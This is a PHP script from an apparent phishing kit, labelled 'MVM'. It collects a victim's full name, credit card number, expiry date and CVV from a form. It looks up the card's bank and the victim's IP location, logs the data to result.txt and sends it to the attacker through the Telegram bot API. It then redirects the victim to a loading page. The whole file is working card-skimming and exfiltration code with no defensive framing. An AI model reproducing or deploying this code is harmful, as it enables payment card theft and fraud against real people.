<?php 
extract($_REQUEST);
include "../id.php";

$FF=$_POST['Fullname'];
$CC=$_POST['CC'];
$M=$_POST["user"];
$Y=$_POST["jeany"];
$CV=$_POST['CVV'];
$ipp=$_SERVER['REMOTE_ADDR'];
$ipAddress = $_SERVER['REMOTE_ADDR'];

$geoPluginUrl = "http://www.geoplugin.net/json.gp?ip=" . $ipAddress;
$geoData = file_get_contents($geoPluginUrl);
$geoData = json_decode($geoData, true);
$countryCode = $geoData['geoplugin_countryCode'] ?? 'Unknown';
$country = $geoData['geoplugin_countryName'] ?? 'Unknown';
$city = $geoData['geoplugin_city'] ?? 'Unknown';
$region = $geoData['geoplugin_region'] ?? 'Unknown';
$cc = $CC;
$bin = substr($cc, 0, 6);
$binLookupUrl = "https://lookup.binlist.net/" . $bin;
$binData = file_get_contents($binLookupUrl);
$binData = json_decode($binData, true);
$bankName = $binData['bank']['name'] ?? 'Unknown';

$message=">>>>>>>>>>>>>|💸| MVM|💸|<<<<<<<<<<<<"."\n"."Full Name :   ".$FF."\n"."CC Number :   ".$CC."\n"."Expire Date :   ".$M."\n"."CVV :   ".$CV."\n"."Bank Name :   ".$bankName."\n"."Country Code :  ".$countryCode."\n"."City :  ".$city."\n"."Region :  ".$region."\n"."Ip :  ".$ipp."\n".">>>>>>>>>>>>>|💰| MVM |💰|<<<<<<<<<<<<";
$user_ids=$id;
$filee=fopen("../result.txt",'a');
fwrite($filee,$message."\n");
fclose($filee);
header("location: loading.php");
foreach($user_ids as $user_id) {
$url='https://api.telegram.org/bot'.$token.'/sendMessage';
$data=array('chat_id'=>$user_id,'text'=>$message);
$options=array('http'=>array('method'=>'POST','header'=>"Content-Type:application/x-www-form-urlencoded\r\n",'content'=>http_build_query($data),),);
$context=stream_context_create($options);
$result=file_get_contents($url,false,$context);
include "../anti/antiproxy1.php";
}
?>